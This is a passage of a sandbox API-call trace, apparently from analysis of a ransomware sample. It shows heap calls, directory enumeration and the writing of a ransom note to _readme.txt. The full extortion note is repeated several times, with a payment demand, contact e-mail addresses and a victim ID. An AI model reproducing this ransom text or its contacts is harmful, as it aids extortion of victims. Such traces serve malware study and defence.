dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.821] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0142.821] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.821] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.821] PathFindFileNameW (pszPath="") returned="" [0142.821] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.822] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.822] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.822] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x9aafb40 [0142.823] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0142.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.823] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0142.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.823] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.823] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.823] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.824] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.824] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.825] CloseHandle (hObject=0x6f0) returned 1 [0142.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.826] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8bbf510, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8bbf510, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.826] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8bbf510, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8bbf510, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.826] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.826] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8bbf510, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8bbf510, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8bbf510, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.826] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8bbf510, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8bbf510, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8bbf510, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.826] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.826] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.829] RtlAllocateHeap 